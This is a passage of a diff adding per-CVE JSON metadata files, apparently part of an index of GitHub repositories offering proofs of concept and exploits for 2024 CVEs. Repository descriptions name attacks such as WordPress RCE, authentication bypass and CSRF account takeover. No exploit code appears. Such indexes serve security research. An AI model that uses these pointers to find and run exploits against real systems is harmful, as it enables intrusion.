"https:\/\/github.com\/Valentin-Metz\/writeup_split", + "description": "Writeup of a heap overflow vulnerability in the GNU coreutils split program. CVE-2024-0684", + "fork": false, + "created_at": "2023-12-15T06:33:15Z", + "updated_at": "2024-06-16T16:25:09Z", + "pushed_at": "2024-01-20T09:31:20Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "binary-exploitation", + "pwn", + "writeup" + ], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-0710.json b/2024/CVE-2024-0710.json new file mode 100644 index 0000000000..7342bf815a --- /dev/null +++ b/2024/CVE-2024-0710.json @@ -0,0 +1,33 @@ +[ + { + "id": 784606066, + "name": "CVE-2024-0710", + "full_name": "karlemilnikka\/CVE-2024-0710", + "owner": { + "login": "karlemilnikka", + "id": 20514810, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20514810?v=4", + "html_url": "https:\/\/github.com\/karlemilnikka", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/karlemilnikka\/CVE-2024-0710", + "description": "Unauthenticated Form Submission Unique ID Modification", + "fork": false, + "created_at": "2024-04-10T07:23:11Z", + "updated_at": "2024-07-06T00:13:01Z", + "pushed_at": "2024-04-18T13:42:57Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-0713.json b/2024/CVE-2024-0713.json new file mode 100644 index 0000000000..41e56fb19f --- /dev/null +++ b/2024/CVE-2024-0713.json @@ -0,0 +1,33 @@ +[ + { + "id": 770828784, + "name": "CVE-2024-0713", + "full_name": "kitodd\/CVE-2024-0713", + "owner": { + "login": "kitodd", + "id": 158980530, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158980530?v=4", + "html_url": "https:\/\/github.com\/kitodd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kitodd\/CVE-2024-0713", + "description": null, + "fork": false, + "created_at": "2024-03-12T08:32:26Z", + "updated_at": "2024-03-12T08:32:26Z", + "pushed_at": "2024-03-12T08:32:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-0741.json b/2024/CVE-2024-0741.json new file mode 100644 index 0000000000..5e95a889e0 --- /dev/null +++ b/2024/CVE-2024-0741.json @@ -0,0 +1,33 @@ +[ + { + "id": 841296829, + "name": "Firefox-ANGLE-CVE-2024-0741", + "full_name": "HyHy100\/Firefox-ANGLE-CVE-2024-0741", + "owner": { + "login": "HyHy100", + "id": 21271840, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21271840?v=4", + "html_url": "https:\/\/github.com\/HyHy100", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HyHy100\/Firefox-ANGLE-CVE-2024-0741", + "description": "PoC for an OOB write vulnerability I reported to Mozilla in ANGLE Translator (aka WebGL Shader Compiler).", + "fork": false, + "created_at": "2024-08-12T05:57:34Z", + "updated_at": "2024-09-11T13:40:15Z", + "pushed_at": "2024-08-12T07:26:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-0757.json b/2024/CVE-2024-0757.json new file mode 100644 index 0000000000..e697a9873f --- /dev/null +++ b/2024/CVE-2024-0757.json @@ -0,0 +1,40 @@ +[ + { + "id": 816179994, + "name": "CVE-2024-0757-Exploit", + "full_name": "hunThubSpace\/CVE-2024-0757-Exploit", + "owner": { + "login": "hunThubSpace", + "id": 49031710, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49031710?v=4", + "html_url": "https:\/\/github.com\/hunThubSpace", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hunThubSpace\/CVE-2024-0757-Exploit", + "description": "A PoC Exploit for CVE-2024-0757 - Insert or Embed Articulate Content into WordPress Remote Code Execution (RCE)", + "fork": false, + "created_at": "2024-06-17T07:46:21Z", + "updated_at": "2024-11-20T16:30:50Z", + "pushed_at": "2024-06-18T14:12:08Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bugbounty", + "cve", + "ethical-hacking", + "exploit", + "penetration-testing", + "web" + ], + "visibility": "public", + "forks": 2, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-0762.json b/2024/CVE-2024-0762.json new file mode 100644 index 0000000000..e39f1f86fb --- /dev/null +++ b/2024/CVE-2024-0762.json @@ -0,0 +1,33 @@ +[ + { + "id": 852572281, + "name": "Detect-CVE-2024-0762", + "full_name": "tadash10\/Detect-CVE-2024-0762", + "owner": { + "login": "tadash10", + "id": 126980610, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/126980610?v=4", + "html_url": "https:\/\/github.com\/tadash10", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tadash10\/Detect-CVE-2024-0762", + "description": "Detecting vulnerabilities like CVE-2024-0762, particularly in UEFI firmware, is quite challenging due to the low-level nature ", + "fork": false, + "created_at": "2024-09-05T03:25:58Z", + "updated_at": "2024-09-20T02:36:37Z", + "pushed_at": "2024-09-20T02:36:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-0783.json b/2024/CVE-2024-0783.json new file mode 100644 index 0000000000..d8406e38c7 --- /dev/null +++ b/2024/CVE-2024-0783.json @@ -0,0 +1,35 @@ +[ + { + "id": 746234103, + "name": "Online-Admission-System-RCE-PoC", + "full_name": "keru6k\/Online-Admission-System-RCE-PoC", + "owner": { + "login": "keru6k", + "id": 73579653, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73579653?v=4", + "html_url": "https:\/\/github.com\/keru6k", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/keru6k\/Online-Admission-System-RCE-PoC", + "description": "projectworlds' Online Admission System RCE vulnerability PoC, Categorized as CVE-2024-0783", + "fork": false, + "created_at": "2024-01-21T13:26:09Z", + "updated_at": "2024-01-23T12:52:02Z", + "pushed_at": "2024-01-21T13:29:42Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-0783" + ], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-0944.json b/2024/CVE-2024-0944.json new file mode 100644 index 0000000000..970f223970 --- /dev/null +++ b/2024/CVE-2024-0944.json @@ -0,0 +1,33 @@ +[ + { + "id": 855192500, + "name": "cve-2024-0944", + "full_name": "Artemisxxx37\/cve-2024-0944", + "owner": { + "login": "Artemisxxx37", + "id": 126729925, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/126729925?v=4", + "html_url": "https:\/\/github.com\/Artemisxxx37", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Artemisxxx37\/cve-2024-0944", + "description": null, + "fork": false, + "created_at": "2024-09-10T13:23:25Z", + "updated_at": "2024-10-11T14:48:37Z", + "pushed_at": "2024-10-11T14:48:08Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": true, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-0986.json b/2024/CVE-2024-0986.json new file mode 100644 index 0000000000..0eb6f141e1 --- /dev/null +++ b/2024/CVE-2024-0986.json @@ -0,0 +1,40 @@ +[ + { + "id": 787180944, + "name": "Issabel-PBX-4.0.0-RCE-Authenticated", + "full_name": "gunzf0x\/Issabel-PBX-4.0.0-RCE-Authenticated", + "owner": { + "login": "gunzf0x", + "id": 31874167, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31874167?v=4", + "html_url": "https:\/\/github.com\/gunzf0x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gunzf0x\/Issabel-PBX-4.0.0-RCE-Authenticated", + "description": "Issabel PBX 4.0.0 Remote Code Execution (Authenticated) - CVE-2024-0986", + "fork": false, + "created_at": "2024-04-16T03:24:25Z", + "updated_at": "2024-09-02T10:24:53Z", + "pushed_at": "2024-08-24T07:09:47Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-0986", + "exploit", + "issabel-pbx", + "payload", + "rce", + "rce-exploit" + ], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-10015.json b/2024/CVE-2024-10015.json new file mode 100644 index 0000000000..e519511f19 --- /dev/null +++ b/2024/CVE-2024-10015.json @@ -0,0 +1,33 @@ +[ + { + "id": 890490572, + "name": "CVE-2024-10015", + "full_name": "windz3r0day\/CVE-2024-10015", + "owner": { + "login": "windz3r0day", + "id": 179751303, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/179751303?v=4", + "html_url": "https:\/\/github.com\/windz3r0day", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/windz3r0day\/CVE-2024-10015", + "description": "CVE-2024-10015 poc exploit", + "fork": false, + "created_at": "2024-11-18T16:53:43Z", + "updated_at": "2024-11-24T07:51:55Z", + "pushed_at": "2024-11-18T19:56:03Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-10140.json b/2024/CVE-2024-10140.json new file mode 100644 index 0000000000..b7e81d3c4c --- /dev/null +++ b/2024/CVE-2024-10140.json @@ -0,0 +1,33 @@ +[ + { + "id": 875667904, + "name": "CVE-2024-10140", + "full_name": "holypryx\/CVE-2024-10140", + "owner": { + "login": "holypryx", + "id": 182792867, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/182792867?v=4", + "html_url": "https:\/\/github.com\/holypryx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/holypryx\/CVE-2024-10140", + "description": null, + "fork": false, + "created_at": "2024-10-20T15:29:14Z", + "updated_at": "2024-10-22T10:02:17Z", + "pushed_at": "2024-10-20T15:31:02Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-10220.json b/2024/CVE-2024-10220.json new file mode 100644 index 0000000000..1e87a3e940 --- /dev/null +++ b/2024/CVE-2024-10220.json @@ -0,0 +1,33 @@ +[ + { + "id": 891905563, + "name": "CVE-2024-10220-githooks", + "full_name": "mochizuki875\/CVE-2024-10220-githooks", + "owner": { + "login": "mochizuki875", + "id": 37737691, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37737691?v=4", + "html_url": "https:\/\/github.com\/mochizuki875", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mochizuki875\/CVE-2024-10220-githooks", + "description": "CVE-2024-10220 Test repo", + "fork": false, + "created_at": "2024-11-21T06:59:21Z", + "updated_at": "2024-11-21T08:25:57Z", + "pushed_at": "2024-11-21T07:28:49Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-10245.json b/2024/CVE-2024-10245.json new file mode 100644 index 0000000000..ff2cfd2e8d --- /dev/null +++ b/2024/CVE-2024-10245.json @@ -0,0 +1,33 @@ +[ + { + "id": 889946220, + "name": "CVE-2024-10245", + "full_name": "RandomRobbieBF\/CVE-2024-10245", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-10245", + "description": "Relais 2FA <= 1.0 - Authentication Bypass", + "fork": false, + "created_at": "2024-11-17T16:34:28Z", + "updated_at": "2024-11-17T16:35:09Z", + "pushed_at": "2024-11-17T16:35:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-10354.json b/2024/CVE-2024-10354.json new file mode 100644 index 0000000000..ce9faba77c --- /dev/null +++ b/2024/CVE-2024-10354.json @@ -0,0 +1,33 @@ +[ + { + "id": 877188085, + "name": "CVE-2024-10354", + "full_name": "K1nako0\/CVE-2024-10354", + "owner": { + "login": "K1nako0", + "id": 105909793, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105909793?v=4", + "html_url": "https:\/\/github.com\/K1nako0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/K1nako0\/CVE-2024-10354", + "description": null, + "fork": false, + "created_at": "2024-10-23T08:37:18Z", + "updated_at": "2024-10-26T13:50:18Z", + "pushed_at": "2024-10-23T08:37:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-10355.json b/2024/CVE-2024-10355.json new file mode 100644 index 0000000000..e34944f18b --- /dev/null +++ b/2024/CVE-2024-10355.json @@ -0,0 +1,33 @@ +[ + { + "id": 877198778, + "name": "CVE-2024-10355", + "full_name": "K1nako0\/CVE-2024-10355", + "owner": { + "login": "K1nako0", + "id": 105909793, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105909793?v=4", + "html_url": "https:\/\/github.com\/K1nako0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/K1nako0\/CVE-2024-10355", + "description": null, + "fork": false, + "created_at": "2024-10-23T08:59:51Z", + "updated_at": "2024-10-26T13:50:29Z", + "pushed_at": "2024-10-23T09:00:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-10410.json b/2024/CVE-2024-10410.json new file mode 100644 index 0000000000..720c1e47be --- /dev/null +++ b/2024/CVE-2024-10410.json @@ -0,0 +1,33 @@ +[ + { + "id": 878506568, + "name": "CVE-2024-10410", + "full_name": "K1nako0\/CVE-2024-10410", + "owner": { + "login": "K1nako0", + "id": 105909793, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105909793?v=4", + "html_url": "https:\/\/github.com\/K1nako0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/K1nako0\/CVE-2024-10410", + "description": null, + "fork": false, + "created_at": "2024-10-25T14:15:56Z", + "updated_at": "2024-10-26T13:44:39Z", + "pushed_at": "2024-10-25T14:16:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-10448.json b/2024/CVE-2024-10448.json new file mode 100644 index 0000000000..1f8677fd5c --- /dev/null +++ b/2024/CVE-2024-10448.json @@ -0,0 +1,33 @@ +[ + { + "id": 879406614, + "name": "CVE-2024-10448", + "full_name": "bevennyamande\/CVE-2024-10448", + "owner": { + "login": "bevennyamande", + "id": 10162710, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10162710?v=4", + "html_url": "https:\/\/github.com\/bevennyamande", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bevennyamande\/CVE-2024-10448", + "description": "Blood bank CSRF Attack POC", + "fork": false, + "created_at": "2024-10-27T20:18:35Z", + "updated_at": "2024-10-28T18:48:37Z", + "pushed_at": "2024-10-27T22:12:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-10449.json b/2024/CVE-2024-10449.json new file mode 100644 index 0000000000..208d6f814a --- /dev/null +++ b/2024/CVE-2024-10449.json @@ -0,0 +1,33 @@ +[ + { + "id": 883977165, + "name": "CVE-2024-10449-patch", + "full_name": "g-u-i-d\/CVE-2024-10449-patch", + "owner": { + "login": "g-u-i-d", + "id": 3040892, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3040892?v=4", + "html_url": "https:\/\/github.com\/g-u-i-d", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/g-u-i-d\/CVE-2024-10449-patch", + "description": null, + "fork": false, + "created_at": "2024-11-05T23:06:49Z", + "updated_at": "2024-11-05T23:15:23Z", + "pushed_at": "2024-11-05T23:15:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-10470.json b/2024/CVE-2024-10470.json new file mode 100644 index 0000000000..acc5fa5819 --- /dev/null +++ b/2024/CVE-2024-10470.json @@ -0,0 +1,33 @@ +[ + { + "id": 885543843, + "name": "CVE-2024-10470", + "full_name": "RandomRobbieBF\/CVE-2024-10470", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-10470", + "description": "WPLMS Learning Management System for WordPress <= 4.962 – Unauthenticated Arbitrary File Read and Deletion", + "fork": false, + "created_at": "2024-11-08T19:47:34Z", + "updated_at": "2024-11-08T19:50:12Z", + "pushed_at": "2024-11-08T19:50:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-10508.json b/2024/CVE-2024-10508.json new file mode 100644 index 0000000000..d6ffc75d0d --- /dev/null +++ b/2024/CVE-2024-10508.json @@ -0,0 +1,76 @@ +[ + { + "id": 890697251, + "name": "CVE-2024-10508", + "full_name": "ubaii\/CVE-2024-10508", + "owner": { + "login": "ubaii", + "id": 31325580, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31325580?v=4", + "html_url": "https:\/\/github.com\/ubaii", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ubaii\/CVE-2024-10508", + "description": null, + "fork": false, + "created_at": "2024-11-19T02:47:59Z", + "updated_at": "2024-11-19T02:50:12Z", + "pushed_at": "2024-11-19T02:50:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 891857006, + "name": "CVE-2024-10508", + "full_name": "Jenderal92\/CVE-2024-10508", + "owner": { + "login": "Jenderal92", + "id": 59664965, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59664965?v=4", + "html_url": "https:\/\/github.com\/Jenderal92", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Jenderal92\/CVE-2024-10508", + "description": "This tool scans WordPress sites for vulnerabilities in the \"RegistrationMagic\" plugin (CVE-2024-10508). It checks for the presence of a specific version (`6.0.2.6`) and marks the site as vulnerable if found. The results are saved in a file (`vuln.txt`) for further analysis.", + "fork": false, + "created_at": "2024-11-21T04:32:19Z", + "updated_at": "2024-11-24T02:13:06Z", + "pushed_at": "2024-11-21T04:39:49Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-10508", + "cve-scanner", + "plugin-security", + "python", + "registrationmagic", + "security-tools", + "vulnerability", + "vulnerability-detection", + "vulnerability-scanner", + "wordpress", + "wordpress-security" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-10542.json b/2024/CVE-2024-10542.json new file mode 100644 index 0000000000..9e5be9f18e --- /dev/null +++ b/2024/CVE-2024-10542.json @@ -0,0 +1,33 @@ +[ + { + "id": 894757253, + "name": "CVE-2024-10542", + "full_name": "ubaii\/CVE-2024-10542", + "owner": { + "login": "ubaii", + "id": 31325580, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31325580?v=4", + "html_url": "https:\/\/github.com\/ubaii", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ubaii\/CVE-2024-10542", + "description": "WordPress Spam protection, AntiSpam, FireWall by CleanTalk Plugin <= 6.43.2 is vulnerable to Unauthenticated Arbitrary Plugin Installation", + "fork": false, + "created_at": "2024-11-26T23:47:17Z", + "updated_at": "2024-11-28T11:51:19Z", + "pushed_at": "2024-11-26T23:49:15Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-10557.json b/2024/CVE-2024-10557.json new file mode 100644 index 0000000000..8d65df2645 --- /dev/null +++ b/2024/CVE-2024-10557.json @@ -0,0 +1,33 @@ +[ + { + "id": 879936174, + "name": "CVE-2024-10557", + "full_name": "bevennyamande\/CVE-2024-10557", + "owner": { + "login": "bevennyamande", + "id": 10162710, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10162710?v=4", + "html_url": "https:\/\/github.com\/bevennyamande", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bevennyamande\/CVE-2024-10557", + "description": "A CSRF POC for Updating the Profile of a Hospital leading to Account Takeover", + "fork": false, + "created_at": "2024-10-28T20:14:45Z", + "updated_at": "2024-10-30T21:38:18Z", + "pushed_at": "2024-10-28T20:40:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-10586.json b/2024/CVE-2024-10586.json new file mode 100644 index 0000000000..1b7ed2d15c --- /dev/null +++ b/2024/CVE-2024-10586.json @@ -0,0 +1,33 @@ +[ + { + "id": 886165127, + "name": "CVE-2024-10586", + "full_name": "RandomRobbieBF\/CVE-2024-10586", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-10586", + "description": "Debug Tool <= 2.2 - Unauthenticated Arbitrary File Creation", + "fork": false, + "created_at": "2024-11-10T11:30:05Z", + "updated_at": "2024-11-15T13:24:00Z", + "pushed_at": "2024-11-10T11:30:46Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-10592.json b/2024/CVE-2024-10592.json new file mode 100644 index 0000000000..dbfffaebc4 --- /dev/null +++ b/2024/CVE-2024-10592.json @@ -0,0 +1,33 @@ +[ + { + "id": 890584132, + "name": "CVE-2024-10592", + "full_name": "windz3r0day\/CVE-2024-10592", + "owner": { + "login": "windz3r0day", + "id": 179751303, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/179751303?v=4", + "html_url": "https:\/\/github.com\/windz3r0day", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/windz3r0day\/CVE-2024-10592", + "description": "CVE-2024-10592 poc exploit ", + "fork": false, + "created_at": "2024-11-18T20:34:38Z", + "updated_at": "2024-11-18T20:51:34Z", + "pushed_at": "2024-11-18T20:39:29Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-10605.json b/2024/CVE-2024-10605.json new file mode 100644 index 0000000000..c9577a23ca --- /dev/null +++ b/2024/CVE-2024-10605.json @@ -0,0 +1,33 @@ +[ + { + "id": 881099968, + "name": "CVE-2024-10605", + "full_name": "bevennyamande\/CVE-2024-10605", + "owner": { + "login": "bevennyamande", + "id": 10162710, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10162710?v=4", + "html_url": "https:\/\/github.com\/bevennyamande", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bevennyamande\/CVE-2024-10605", + "description": null, + "fork": false, + "created_at": "2024-10-30T22:56:24Z", + "updated_at": "2024-11-03T23:41:01Z", + "pushed_at": "2024-10-30T23:06:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-10629.json b/2024/CVE-2024-10629.json new file mode 100644 index 0000000000..ea1ffa96c8 --- /dev/null +++ b/2024/CVE-2024-10629.json @@ -0,0 +1,33 @@ +[ + { + "id": 887379678, + "name": "CVE-2024-10629", + "full_name": "RandomRobbieBF\/CVE-2024-10629", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-10629", + "description": "GPX Viewer <= 2.2.8 - Authenticated (Subscriber+) Arbitrary File Creation", + "fork": false, + "created_at": "2024-11-12T16:36:20Z", + "updated_at": "2024-11-12T16:38:23Z", + "pushed_at": "2024-11-12T16:38:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-10654.json b/2024/CVE-2024-10654.json new file mode 100644 index 0000000000..593ff98f9e --- /dev/null +++ b/2024/CVE-2024-10654.json @@ -0,0 +1,33 @@ +[ + { + "id": 881183952, + "name": "IoT_vuln", + "full_name": "c0nyy\/IoT_vuln", + "owner": { + "login": "c0nyy", + "id": 146458543, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/146458543?v=4", + "html_url": "https:\/\/github.com\/c0nyy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/c0nyy\/IoT_vuln", + 